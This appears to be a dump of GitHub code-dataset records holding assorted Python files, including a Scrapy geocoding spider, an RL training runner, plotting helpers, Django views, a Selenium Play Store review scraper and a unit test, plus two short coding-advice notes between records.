'symilar = pylint:run_symilar',\n ]}\n kwargs['packages'] = packages\n cmdclass = {'install_lib': MyInstallLib,\n 'build_py': build_py}\n if easy_install_lib:\n cmdclass['easy_install'] = easy_install\n return setup(name=distname,\n version=__pkginfo__['version'],\n license=__pkginfo__['license'],\n description=__pkginfo__['description'],\n long_description=long_description,\n author=__pkginfo__['author'],\n author_email=__pkginfo__['author_email'],\n url=__pkginfo__['web'],\n scripts=ensure_scripts(scripts),\n classifiers=__pkginfo__['classifiers'],\n 
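The hand-rolled get_packages walker in pylint's setup.py above reimplements package discovery; when setuptools is available the same result is one call (equivalent only under the usual __init__.py layout the walker also assumes):

from setuptools import find_packages

# Discovers 'pylint' and every subpackage carrying an __init__.py, like
# get_packages(join(base_dir, 'pylint'), 'pylint') plus the root package.
packages = find_packages(include=["pylint", "pylint.*"])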
data_files=data_files,\n ext_modules=ext_modules,\n cmdclass=cmdclass,\n extras_require=extras_require,\n test_suite='test',\n python_requires='>=3.4.*',\n setup_requires=['pytest-runner'],\n tests_require=['pytest'],\n **kwargs)\n\nif __name__ == '__main__':\n install()\n","repo_name":"gtt116/vimrc","sub_path":"vim/bundle/python-mode/submodules/pylint/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"65"} +{"seq_id":"30142100033","text":"import scrapy\nfrom scrapy.shell import inspect_response\nfrom urllib import parse\nfrom os import environ\nfrom urllib.request import urlopen\nimport json\n\napi_key = environ.get('GMAPS_API_KEY')\n\nclass NaganoSpider(scrapy.Spider):\n \n name = \"nagano\"\n\n start_urls = [\n 'http://nagano-akiyabank.jp/search/'\n ]\n\n def parse(self, response):\n for item in response.css('.rakuenakiyaBukken'):\n images = item.css('.photoBox img::attr(src)').getall()\n price = int(float(item.css('.price .num::text').get()) * 10000)\n location_raw = item.css('h3 a::text').get()\n\n location_url = f\"https://maps.googleapis.com/maps/api/geocode/json?address={parse.quote(location_raw)}&key={api_key}\"\n location_data = json.load(urlopen(location_url))['results'][0]\n coordinates = location_data['geometry']['location']\n url = \"http://nagano-akiyabank.jp\" + item.css('h3 a::attr(href)').get()\n\n yield {\n \"locationRaw\": location_raw,\n \"longitude\": coordinates['lng'],\n \"latitude\": coordinates['lat'],\n \"price\": price,\n \"url\": url,\n \"image1\": images[0],\n \"image2\": images[1],\n \"image3\": images[2],\n }\n ","repo_name":"Greycastle/akiyan","sub_path":"scraper/nagano.py","file_name":"nagano.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"6045313924","text":"import sys\nimport multiprocessing\nimport os.path as osp\nimport gym\nfrom collections import defaultdict\nimport tensorflow as tf\nimport numpy as np\n\nfrom baselines.common.vec_env.vec_video_recorder import VecVideoRecorder\nfrom baselines.common.vec_env.vec_frame_stack import VecFrameStack\nfrom baselines.common.cmd_util import common_arg_parser, parse_unknown_args, make_vec_env, make_env\nfrom baselines.common.tf_util import get_session\nfrom baselines import logger\nfrom importlib import import_module\n\nfrom car_environment import CarEnvironment\n\nfrom baselines.common.vec_env.vec_normalize import VecNormalize\n\ntry:\n from mpi4py import MPI\nexcept ImportError:\n MPI = None\n\ntry:\n import pybullet_envs\nexcept ImportError:\n pybullet_envs = None\n\ntry:\n import roboschool\nexcept ImportError:\n roboschool = None\n\ndef train(args, extra_args):\n\n env_type = 'car-environment'\n print('env_type: {}'.format(env_type))\n\n total_timesteps = int(args.num_timesteps)\n seed = args.seed\n\n learn = get_learn_function(args.alg)\n alg_kwargs = {}\n alg_kwargs.update(extra_args)\n\n env = build_env(args)\n \n if args.network:\n alg_kwargs['network'] = args.network\n else:\n if alg_kwargs.get('network') is None:\n alg_kwargs['network'] = get_default_network(env_type)\n\n print('Training {} on {} with arguments \\n{}'.format(args.alg, env_type, alg_kwargs))\n\n model = learn(\n env=env,\n seed=seed,\n total_timesteps=total_timesteps,\n **alg_kwargs\n )\n\n return model, env\n\n\ndef build_env(args):\n ncpu = multiprocessing.cpu_count()\n if sys.platform == 'darwin': ncpu //= 
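The nagano spider above geocodes each listing with a blocking urlopen inside parse, which stalls Scrapy's event loop and bypasses its retry and throttling machinery. The idiomatic route is to chain a scrapy.Request to the geocoding endpoint and finish the item in its callback; a sketch (field handling abbreviated, cb_kwargs needs Scrapy >= 1.7):

import json
from os import environ
from urllib import parse
import scrapy

api_key = environ.get("GMAPS_API_KEY")

class NaganoGeoSpider(scrapy.Spider):
    # Hypothetical non-blocking variant of the nagano spider above.
    name = "nagano_geo"
    start_urls = ["http://nagano-akiyabank.jp/search/"]

    def parse(self, response):
        for item in response.css(".rakuenakiyaBukken"):
            location_raw = item.css("h3 a::text").get()
            geo_url = ("https://maps.googleapis.com/maps/api/geocode/json"
                       f"?address={parse.quote(location_raw)}&key={api_key}")
            # Scrapy schedules the geocode fetch asynchronously; the partial
            # item rides along in cb_kwargs instead of blocking with urlopen.
            yield scrapy.Request(geo_url, callback=self.parse_geocode,
                                 cb_kwargs={"item": {"locationRaw": location_raw}})

    def parse_geocode(self, response, item):
        location = json.loads(response.text)["results"][0]["geometry"]["location"]
        item.update(longitude=location["lng"], latitude=location["lat"])
        yield item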
2\n nenv = args.num_env or ncpu\n alg = args.alg\n seed = args.seed\n\n config = tf.ConfigProto(allow_soft_placement=True,\n intra_op_parallelism_threads=1,\n inter_op_parallelism_threads=1)\n config.gpu_options.allow_growth = True\n get_session(config=config)\n\n\n env = CarEnvironment()\n\n return env\n\n\ndef get_default_network(env_type):\n if env_type in {'atari', 'retro','car-environment'}:\n return 'cnn'\n else:\n return 'mlp'\n\ndef get_alg_module(alg, submodule=None):\n submodule = submodule or alg\n # first try to import the alg module from baselines\n alg_module = import_module('.'.join([ alg, submodule]))\n return alg_module\n\n\ndef get_learn_function(alg):\n return get_alg_module(alg).learn\n\n\ndef get_learn_function_defaults(alg, env_type):\n try:\n alg_defaults = get_alg_module(alg, 'defaults')\n kwargs = getattr(alg_defaults, env_type)()\n except (ImportError, AttributeError):\n kwargs = {}\n return kwargs\n\n\n\ndef parse_cmdline_kwargs(args):\n '''\n convert a list of '='-spaced command-line arguments to a dictionary, evaluating python objects when possible\n '''\n def parse(v):\n\n assert isinstance(v, str)\n try:\n return eval(v)\n except (NameError, SyntaxError):\n return v\n\n return {k: parse(v) for k,v in parse_unknown_args(args).items()}\n\n\n\ndef main(args):\n # configure logger, disable logging in child MPI processes (with rank > 0)\n\n arg_parser = common_arg_parser()\n args, unknown_args = arg_parser.parse_known_args(args)\n extra_args = parse_cmdline_kwargs(unknown_args)\n\n if MPI is None or MPI.COMM_WORLD.Get_rank() == 0:\n rank = 0\n logger.configure()\n else:\n logger.configure(format_strs=[])\n rank = MPI.COMM_WORLD.Get_rank()\n\n model, env = train(args, extra_args)\n env.close()\n\n if args.save_path is not None and rank == 0:\n save_path = osp.expanduser(args.save_path)\n model.save(save_path)\n\n if args.play:\n logger.log(\"Running trained model\")\n env = build_env(args)\n obs = env.reset()\n def initialize_placeholders(nlstm=128,**kwargs):\n return np.zeros((args.num_env or 1, 2*nlstm)), np.zeros((1))\n state, dones = initialize_placeholders(**extra_args)\n while True:\n actions, _, state, _ = model.step(obs,S=state, M=dones)\n obs, _, done, _ = env.step(actions)\n env.render()\n done = done.any() if isinstance(done, np.ndarray) else done\n\n if done:\n obs = env.reset()\n\n env.close()\n\n return model\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"habichta/AirSimCarKerasRLEnvironment","sub_path":"OpenAISelfDrivingCar/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"7145884528","text":"import json\nimport logging\nfrom pathlib import Path\nfrom typing import Any, Dict, List\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.metrics import mean_absolute_error as mae\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.metrics import r2_score\n\nfrom ndj_pipeline import utils\n\n# Hack to get plots working correctly on command line\ntry:\n if get_ipython().__class__.__name__ == \"ZMQInteractiveShell\": # type: ignore\n pass\nexcept NameError:\n matplotlib.use(\"agg\")\n\nfive_thirty_eight = [\n \"#30a2da\",\n \"#fc4f30\",\n \"#e5ae38\",\n \"#6d904f\",\n \"#8b8b8b\",\n]\n\nsns.set_palette(five_thirty_eight)\nsns.set(rc={\"figure.figsize\": (8, 5)})\n\n\ndef create_metrics_plot(results: pd.DataFrame, model_config: Dict[str, 
Any], name: str = \"\") -> None:\n \"\"\"Produce metrics and scatterplot for results table.\n\n No returns; saves assets to model folder.\n\n Args:\n results: DataFrame with \"Actual\" and \"Prediction\" columns\n model_config: Loaded model experiment config\n name: Simple label added to outputs, helpful to distinguish models\n \"\"\"\n # Metrics\n _r2 = r2_score(results[\"Actual\"], results[\"Predicted\"])\n _mae = mae(results[\"Actual\"], results[\"Predicted\"])\n _mse = mse(results[\"Actual\"], results[\"Predicted\"])\n\n metrics = {\"r2\": round(_r2, 2), \"mae\": round(_mae, 5), \"mse\": round(_mse, 5)}\n\n output_path = Path(utils.get_model_path(model_config), \"metrics.json\")\n with open(output_path, \"w\") as f:\n json.dump(metrics, f)\n\n # Plot\n plt.figure()\n plot_fig, plot_ax = plt.subplots()\n logging.debug(f\"Creating plot figure {name}\")\n\n metrics_text = \", \".join([f\"{name}: {result}\" for name, result in metrics.items()])\n title = f\"{name} - Predicted {model_config.get('target')} \\n {metrics_text}\"\n\n # Done to exclude very wild Predictions from plot, symetrically across the two sets\n lower_clip = model_config.get(\"plot_min_clip\", 0)\n upper_clip = model_config.get(\"plot_max_clip\", 1)\n lower_clip_actual = float(results[\"Actual\"].quantile(lower_clip))\n upper_clip_actual = float(results[\"Actual\"].quantile(upper_clip))\n lower_clip_predicted = float(results[\"Predicted\"].quantile(lower_clip))\n upper_clip_predicted = float(results[\"Predicted\"].quantile(upper_clip))\n lower_clip = min(lower_clip_actual, lower_clip_predicted)\n upper_clip = max(upper_clip_actual, upper_clip_predicted)\n results[\"Actual\"] = results[\"Actual\"].clip(lower=lower_clip, upper=upper_clip)\n results[\"Predicted\"] = results[\"Predicted\"].clip(lower=lower_clip, upper=upper_clip)\n results_min_max = [results.min().min(), results.max().max()]\n line_series = pd.Series(results_min_max, index=results_min_max)\n\n sns.scatterplot(data=results, x=\"Actual\", y=\"Predicted\", ax=plot_ax).set_title(title)\n sns.lineplot(data=line_series, color=\"orange\", ax=plot_ax)\n logging.debug(f\"Plot figure drawn {name}\")\n\n output_path = Path(utils.get_model_path(model_config), f\"plots_metrics_{name}.png\")\n logging.debug(f\"Saving plot to {output_path}\")\n plot_fig.savefig(output_path)\n plt.close(\"all\")\n\n\ndef create_univariate_plots(df: pd.DataFrame, reporting_features: List[str], model_config: Dict[str, Any]) -> None:\n \"\"\"Create scatterplots with linear fit for each feature against target.\n\n No returns; saves assets to model folder.\n\n Args:\n df: Full, feature rich dataframe, must contain config specified\n target, and numeric feature columns specified by `reporting_features`\n reporting_features: List of features to produce individual plots\n model_config: Loaded model experiment config\n \"\"\"\n df[reporting_features] = df[reporting_features].astype(float)\n\n # Limit sample, if too large this is really slow\n if df.shape[0] > 5000:\n data = df.sample(5000)\n else:\n data = df\n\n for feature in reporting_features:\n plt.figure()\n plot_fig, plot_ax = plt.subplots()\n\n title = f\"Univariate plot of {model_config['target']} and {feature}\"\n sns.regplot(data=data, y=model_config[\"target\"], x=feature, ax=plot_ax).set_title(title)\n\n # in case comes in from dummy variables\n feature = feature.replace(\"<\", \"\").replace(\">\", \"\")\n output_path = Path(utils.get_model_path(model_config), f\"plots_univariate_{feature}.png\")\n logging.info(f\"Saving to: 
{output_path}\")\n plot_fig.savefig(output_path)\n plt.close(\"all\")\n\n\ndef create_continuous_plots(df: pd.DataFrame, reporting_features: List[str], model_config: Dict[str, Any]) -> None:\n \"\"\"Create line plot to show how target varies according to feature.\n\n No returns; saves assets to model folder.\n\n Args:\n df: Full, feature rich dataframe, must contain config specified\n target, and numeric feature columns specified by `reporting_features`\n reporting_features: List of features to produce individual plots\n model_config: Loaded model experiment config\n \"\"\"\n df[reporting_features] = df[reporting_features].astype(float)\n\n for feature in reporting_features:\n plt.figure()\n plot_fig, plot_ax = plt.subplots()\n\n data = df.groupby(feature)[model_config[\"target\"]].mean()\n\n title = f\"Continuous plot of {model_config['target']} and {feature}\"\n sns.lineplot(data=data, ax=plot_ax).set_title(title)\n\n # in case comes in from dummy variables\n feature = feature.replace(\"<\", \"\").replace(\">\", \"\")\n output_path = Path(utils.get_model_path(model_config), f\"plots_continuous_{feature}.png\")\n logging.info(f\"Saving to: {output_path}\")\n plot_fig.savefig(output_path)\n plt.close(\"all\")\n\n\ndef create_correlation_matrix(df: pd.DataFrame, reporting_features: List[str], model_config: Dict[str, Any]) -> None:\n \"\"\"Create correlation matrix between subset of reported features.\n\n No returns; saves assets to model folder.\n\n Args:\n df: Full, feature rich dataframe, must contain config specified\n target, and numeric feature columns specified by `reporting_features`\n reporting_features: List of features to produce individual plots\n model_config: Loaded model experiment config\n \"\"\"\n plt.figure()\n\n corr_matrix = df[reporting_features].corr()\n for col in corr_matrix.columns:\n corr_matrix.loc[col, col] = corr_matrix[col].mean()\n\n # Check for problems\n if corr_matrix.isna().any().any():\n problem = corr_matrix.isna().sum().idxmax()\n logging.warning(f\"Problem with at least one feature column {problem}, no variation in corr matrix\")\n corr_matrix = corr_matrix.fillna(0)\n\n plot = sns.clustermap(corr_matrix)\n\n output_path = Path(utils.get_model_path(model_config), \"plots_correlation.png\")\n logging.info(f\"Saving plot to {output_path}\")\n plot.savefig(output_path)\n plt.close(\"all\")\n","repo_name":"ndjenkins85/ndj_cookie","sub_path":"ndj_pipeline/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"503502497","text":"# Given a string s, return true if the s can be palindrome after deleting at most one character from it.\n\n# Example 1:\n# Input: s = \"aba\"\n# Output: true\n\n# Example 2:\n# Input: s = \"abca\"\n# Output: true\n# Explanation: You could delete the character 'c'.\n\n# Example 3:\n# Input: s = \"abc\"\n# Output: false\n \n# Constraints:\n# 1 <= s.length <= 105\n# s consists of lowercase English letters.\n\n\nclass Solution:\n \n @staticmethod\n def isPalindrome(str, s, e):\n while s bool:\n if s == s[::-1]:\n return True\n \n size = len(s)\n start = 0 \n end = size-1\n while start < end:\n if s[start] != s[end]:\n if(Solution.isPalindrome(s, start+1, end) or Solution.isPalindrome(s, start, end-1)):\n return True\n else:\n return False\n start +=1 \n end -=1\n \n return True\n \n\nobj = Solution()\n# result = obj.validPalindrome(\"abdcca\")\n# result = 
obj.validPalindrome(\"aguokepatgbnvfqmgmlcupuufxoohdfpgjdmysgvhmvffcnqxjjxqncffvmhvgsymdjgpfdhooxfuupuculmgmqfvnbgtapekouga\") #True\n# result = obj.validPalindrome(\"ebcbbececabbacecbbcbe\") # True\nresult = obj.validPalindrome(\"eeccccbebaeeabebccceea\") # False\nprint(result)\n\n\n","repo_name":"jahidmunna/leetcode","sub_path":"valid_palindromeii.py","file_name":"valid_palindromeii.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"72632956046","text":"from datasets import load_dataset\nimport pandas as pd\nimport tiktoken\nfrom openai.embeddings_utils import get_embedding\nimport openai\nimport csv\n\n# openai.api_key = \"\"\n\n\"\"\"Helper methods to get texts and embedding\"\"\"\ndef output_dataset_to_csv(path=\"./recsim_ng/data/ag_news_train.csv\"):\n file = open(path, 'w')\n writer = csv.writer(file)\n # header line\n writer.writerow([\"text\", \"label\"])\n for item in load_dataset(\"ag_news\", split=\"train\"):\n data = [item[\"text\"], item[\"label\"]]\n writer.writerow(data)\n\ndef output_all_embedding_to_csv(num, path=\"./recsim_ng/data/ag_news_train.csv\"):\n embedding_model = \"text-embedding-ada-002\"\n embedding_encoding = \"cl100k_base\" # this the encoding for text-embedding-ada-002\n max_tokens = 8000 # the maximum for text-embedding-ada-002 is 8191\n df = pd.read_csv(path)\n # num = -1 means encodes all data to embeddings\n if num != -1:\n df = df[[\"text\", \"label\"]].tail(num*2) # first cut to first 2k entries, assuming less than half will be filtered out\n else:\n df = df[[\"text\", \"label\"]] \n\n encoding = tiktoken.get_encoding(embedding_encoding)\n\n # omit text that are too long to embed\n df[\"n_tokens\"] = df.text.apply(lambda x: len(encoding.encode(x)))\n if num != -1:\n df = df[df.n_tokens <= max_tokens].tail(num)\n else:\n df = df[df.n_tokens <= max_tokens]\n\n df[\"embedding\"] = df.text.apply(lambda x: get_embedding(x, engine=embedding_model))\n # Notice: the embedding has 1536 dimensions\n df.to_csv(\"./recsim_ng/data/ag_news_train_embeddings.csv\")\n\n","repo_name":"Xiayucheng1212/recsim_ng","sub_path":"recsim_ng/applications/low_cost_model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"3644139297","text":"\"\"\"\nDocumentation : This module retrieves rss feed of a website \n in the form of a XML document\n\n\"\"\"\nimport urllib.request\ndef downloadXml():\n \"\"\"\n This function retrieves the xml document from the rss feed of \n a website and saves it locally\n \"\"\"\n url = \"http://feeds.feedburner.com/gadgets360-latest\"\n urllib.request.urlretrieve(url,'news_tech.xml')#Retrieve feed url and store it locally\n\ndownloadXml()\n","repo_name":"prakashmishra1598/ADBMS-CIA","sub_path":"rss_feed_download.py","file_name":"rss_feed_download.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"22359534535","text":"import django_rq\nimport yaml\nimport importlib.resources\nfrom django.http import Http404\nfrom drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import (\n extend_schema_view,\n extend_schema,\n OpenApiParameter,\n)\nfrom rest_framework import viewsets, status\nfrom rest_framework.views import APIView\nfrom rest_framework.request import Request\nfrom rest_framework.response 
import Response\nfrom rq import job as rq_job\n\nfrom pinakes.common.serializers import TaskSerializer\nfrom pinakes.main.common import models\nfrom pinakes.main.common import serializers\nfrom pinakes.main.common import tasks\n\n\n@extend_schema_view(\n    retrieve=extend_schema(\n        description=\"Get an existing group\",\n    ),\n    list=extend_schema(\n        description=\"List all groups\",\n    ),\n)\nclass GroupViewSet(viewsets.ReadOnlyModelViewSet):\n    serializer_class = serializers.GroupSerializer\n    ordering = (\"name\",)\n\n    def get_queryset(self):\n        roles = self.request.GET.getlist(\"role\")\n        if roles:\n            queryset = models.Group.objects.filter(\n                roles__name__in=roles\n            ).distinct()\n        else:\n            queryset = models.Group.objects.all()\n        return queryset\n\n\n@extend_schema_view(\n    create=extend_schema(\n        description=\"Sync groups from keycloak. Returns a background task id.\",\n        responses={status.HTTP_200_OK: TaskSerializer},\n        request=None,\n    ),\n)\nclass GroupSyncViewSet(viewsets.ViewSet):\n    def create(self, request: Request):\n        job = django_rq.enqueue(tasks.sync_external_groups)\n        serializer = TaskSerializer(job)\n        return Response(serializer.data, status=status.HTTP_202_ACCEPTED)\n\n\n@extend_schema_view(\n    retrieve=extend_schema(\n        description=\"Get the status of a background task\",\n        responses={status.HTTP_200_OK: TaskSerializer},\n        parameters=[\n            OpenApiParameter(\n                \"id\",\n                required=True,\n                type=OpenApiTypes.UUID,\n                location=OpenApiParameter.PATH,\n                description=\"background task UUID\",\n            ),\n        ],\n    ),\n)\nclass TaskViewSet(viewsets.ViewSet):\n    def retrieve(self, request: Request, pk: str):\n        try:\n            job = rq_job.Job.fetch(pk, connection=django_rq.get_connection())\n        except rq_job.NoSuchJobError:\n            raise Http404\n        return Response(TaskSerializer(job).data, status=status.HTTP_200_OK)\n\n\n@extend_schema_view(\n    get=extend_schema(\n        description=\"Get product and version info\",\n        responses={status.HTTP_200_OK: serializers.AboutSerializer},\n    ),\n)\nclass AboutView(APIView):\n    \"\"\"View class for About\"\"\"\n\n    def get(self, request, *args, **kwargs):\n        \"\"\"Returns product and version info\"\"\"\n\n        text = importlib.resources.read_text(\"pinakes\", \"about.yml\")\n        about = yaml.safe_load(text)\n        return Response(\n            serializers.AboutSerializer(about).data,\n            status=status.HTTP_200_OK,\n        )\n","repo_name":"mkanoor/pinakes-something","sub_path":"pinakes/main/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"26693517276","text":"from typing import List\nimport numpy as np\nimport pandas as pd\nimport time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import ElementNotVisibleException, NoSuchElementException, WebDriverException\nfrom bs4 import BeautifulSoup\nimport re\n\nclass app_reviews:\n    \"\"\"\n    Class definition of the webdriver used for reviews scraping\n\n    Parameters\n    ----------\n    driver : selenium.webdriver.webdriver.WebDriver\n        a webdriver to be used\n    url : str\n        URL of the app\n    lang : str\n        driver locale, expected to be either 'cs' or 'en'\n\n    Attributes\n    ----------\n    url : str\n        URL of the app\n    position : int\n        latest position achieved using `move_it` method\n    driver : selenium.webdriver.webdriver.WebDriver\n        exposing the webdriver used for scraping\n    source : bs4.BeautifulSoup\n        exposing the BeautifulSoup parsed webpage source\n    delta: list of int\n        scroll positions from last 5 moves\n    \"\"\"\n\n    def __init__(self, driver, 
url: str, lang: str = 'en') -> None:\n        \"\"\"\n        Starting its own webdriver, initialize the scraping of a new application\n        \"\"\"\n        self.url = url\n        self.position = 0\n        self.driver = driver\n        self.driver.get(url)\n        self.source = -1\n        self.reset_delta()\n        if lang in ['en', 'cs']:\n            self.lang = lang\n        else:\n            raise ValueError(\"The lang is expected to be either 'cs' or 'en'\")\n    #\n    def move_to(self, pos: int) -> None:\n        \"\"\"\n        Move driver to a position defined by Y axis pixels\n\n        Parameters\n        ----------\n        pos : int\n            a pixel representation of the target position (scroll to)\n        \"\"\"\n        self.driver.execute_script(\"window.scrollTo(0, {to})\".format(to = pos))\n    #\n    def move_it(self, pos: int = -1, offset: int = 10000) -> None:\n        \"\"\"\n        Scroll further down, loading more reviews (via button click) if possible.\n        Can be used for incremental scrolling.\n\n        Parameters\n        ----------\n        pos : int\n            a pixel representation of the original position (scroll from)\n        offset : int\n            a number of pixels to be scrolled down\n            - should be large enough to hit the end of page\n        \"\"\"\n        try:\n            next_button = self.driver.find_element_by_xpath('//div[@jsname=\"i3y3Ic\"]')\n            next_button.click()\n        except (NoSuchElementException, WebDriverException):\n            if pos == -1:\n                pos = self.position\n            self.move_to(pos + offset)\n        self.position = self.driver.execute_script(\"return window.pageYOffset;\")\n    #\n    def unwrap_reviews(self) -> None:\n        \"\"\"\n        Unwrap all shortened reviews\n        Walks through the loaded reviews and clicks every 'Show full review' button\n        \"\"\"\n        self.move_to(0)\n        unwrapped = self.driver.find_elements_by_xpath('//button[@jsname=\"gxjVle\"]')\n        for click in unwrapped:\n            try:\n                click.click()\n            except (ElementNotVisibleException, WebDriverException):\n                pass\n    #\n    def get_source(self) -> None:\n        \"\"\"\n        Parse and save the webpage source\n        \"\"\"\n        self.source = -1 # delete previously parsed source\n        self.source = BeautifulSoup(self.driver.page_source, features = \"lxml\")\n        return\n    #\n    def val_source(self) -> None:\n        \"\"\"\n        Validate the page was parsed and saved\n        \"\"\"\n        if self.source == -1:\n            raise ValueError('The page was not parsed. 
Make sure you run `get_source()` method first.')\n    #\n    def reset_delta(self) -> None:\n        \"\"\"\n        Reset iteration movement tracking\n        \"\"\"\n        self.delta = list(reversed(range(5)))\n    #\n    def val_movement(self) -> None:\n        \"\"\"\n        Validate the scrolling is working\n        \"\"\"\n        self.delta.insert(0, self.position)\n        self.delta.pop()\n        if min(self.delta) == max(self.delta):\n            raise RuntimeError('The scrolling process seems to have stopped moving.')\n    #\n    def run_it(self, max_iter: int = 1000, rate: float = 1) -> None:\n        \"\"\"\n        Start the process of loading the reviews\n\n        Parameters\n        ----------\n        max_iter : int\n            a number defining how many times the method `move_it` will be used\n        rate : float\n            waiting time between subsequent calls to method `move_it`\n            - should be large enough for the webdriver to load new content\n        \"\"\"\n        i = 0\n        while i < max_iter:\n            self.move_it()\n            self.val_movement()\n            i += 1\n            time.sleep(rate)\n        self.unwrap_reviews()\n        self.get_source()\n    #\n    def extract_short(self) -> List[str]:\n        \"\"\"\n        Extract the short reviews\n\n        Returns\n        -------\n        list\n            list containing short reviews\n            - position is empty ('') for unwrapped reviews\n        \"\"\"\n        self.val_source()\n        reviews_div = self.source.select('span[jsname=\"bN97Pc\"]')\n        reviews_txt = [i.text for i in reviews_div]\n        return(reviews_txt)\n    #\n    def extract_long(self) -> List[str]:\n        \"\"\"\n        Extract the long (wrapped) reviews\n\n        Returns\n        -------\n        list\n            list containing long reviews\n            - position is empty ('') for short reviews\n        \"\"\"\n        self.val_source()\n        unwrapped_div = self.source.select('span[jsname=\"fbQN7e\"]')\n        unwrapped_txt = [i.text for i in unwrapped_div]\n        return(unwrapped_txt)\n    #\n    def collect_reviews(self) -> List[str] or List[List[str]]:\n        \"\"\"\n        Collect all reviews. Tries to match short and long reviews into a single list\n\n        Returns\n        -------\n        list\n            list of matched reviews, or list of lists of reviews\n        \"\"\"\n        short = self.extract_short()\n        long = self.extract_long()\n        empty_fit = [l == '' for l in long] != [s == '' for s in short]\n        if empty_fit:\n            reviews = [val + long[ix] for ix, val in enumerate(short)]\n        else:\n            reviews = [short, long]\n        return(reviews)\n    #\n    def collect_rating(self) -> List[str]:\n        \"\"\"\n        Collect user ratings of the app\n\n        Returns\n        -------\n        list\n            list containing how the app was rated by users\n        \"\"\"\n        self.val_source()\n        if self.lang == 'cs':\n            rating = self.source.select('span.nt2C1d > div.pf5lIe > div[aria-label*=Hodnocení]')\n        else:\n            rating = self.source.select('span.nt2C1d > div.pf5lIe > div[aria-label*=Rated]')\n        rat_int = [\n            re.findall('\\d+', r.get('aria-label'))[0]\n            for r in rating\n        ]\n        return(rat_int)\n    #\n    def collect_support(self) -> List[str]:\n        \"\"\"\n        Collect the support of the review\n\n        Returns\n        -------\n        list\n            list containing how the review was rated by other users\n        \"\"\"\n        self.val_source()\n        support = self.source.select('div[class=\"jUL89d y92BAb\"]')\n        return([s.text for s in support])\n    #\n    def collect_data(self) -> pd.DataFrame:\n        \"\"\"\n        Collect all data into a pandas.DataFrame\n\n        Returns\n        -------\n        pandas.core.frame.DataFrame\n            table of reviews, ratings and support\n        \"\"\"\n        self.get_source()\n        return(\n            pd.DataFrame({\n                'review' : self.collect_reviews(),\n                'rating' : self.collect_rating(),\n                'support' : self.collect_support()\n            })\n        
)","repo_name":"mikayelh/ies_gplay_scraper","sub_path":"app_reviews.py","file_name":"app_reviews.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"29232422586","text":"'''\nTesting delta_eps backend.\n'''\n\nimport unittest\nimport numpy as np\nfrom delta_eps import *\n\n_NUM_TRIALS_ = 100\n\nclass test_delta_eps(unittest.TestCase):\n '''\n Test functions in delta_eps.py\n '''\n def test_compute_delta(self):\n '''\n Test computation of delta from epsilon for linear functions. If f(x) = mx + b, then given\n eps, delta should equal eps / m\n '''\n for seed in range(_NUM_TRIALS_):\n np.random.seed(seed)\n \n m = np.random.uniform(-10, 10)\n b = np.random.uniform(-10, 10)\n\n f = lambda x: m * x + b \n\n x_minmax = np.random.uniform(-10, 10, size = 2)\n x_min = np.min(x_minmax)\n x_max = np.max(x_minmax)\n\n y_range = np.abs(f(x_max) - f(x_min)) # max(f) - min(f)\n eps = np.random.uniform(1e-3, 1e-1) * y_range\n\n delta_true = eps / np.abs(m)\n\n # so that (a - delta, a + delta) stays in domain\n a = np.random.uniform(x_min + delta_true, x_max - delta_true)\n L = f(a)\n\n delta_stepsize = np.random.uniform(1e-7, 1e-4)\n\n delta = compute_delta(f, a, L, eps, x_min, x_max, delta_stepsize = delta_stepsize)\n\n self.assertTrue(delta_true - delta_stepsize <= delta)\n self.assertTrue(delta <= delta_true + delta_stepsize)\n\n\nif __name__ == \"__main__\":\n unittest.main() \n\n\n\n","repo_name":"PhillipLo/calc-viz","sub_path":"modules/delta_eps/test_delta_eps.py","file_name":"test_delta_eps.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"32557160439","text":"import pickle\r\nimport streamlit as st\r\nfrom xgboost import Booster, DMatrix\r\nfrom tensorflow.keras.models import load_model\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nMODEL_PATH = '../Training V3/trained_models3'\r\nRESULTS_PATH = '../Training V3/results3'\r\n\r\n# Saving encoded Tokenizer model utility\r\n\r\n\r\ndef save_model_pickle(model, filename):\r\n try:\r\n pickle.dump(model, open(f'{MODEL_PATH}/{filename}', 'wb'))\r\n print('Saved')\r\n except Exception as err:\r\n print(err)\r\n\r\n\r\n# Loading saved Pickle model\r\ndef load_model_pickle(filename):\r\n try:\r\n model = pickle.load(open(f'{MODEL_PATH}/{filename}', 'rb'))\r\n return model\r\n except Exception as err:\r\n print(err)\r\n return None\r\n\r\n\r\n@st.cache_resource\r\ndef get_trained_model(algorithm):\r\n model = None\r\n\r\n if algorithm.startswith('Naive'):\r\n model = load_model_pickle(filename='nb_model.pickle')\r\n\r\n elif algorithm.startswith('Support Vector'):\r\n model = load_model_pickle(filename='svc_model.pickle')\r\n\r\n elif 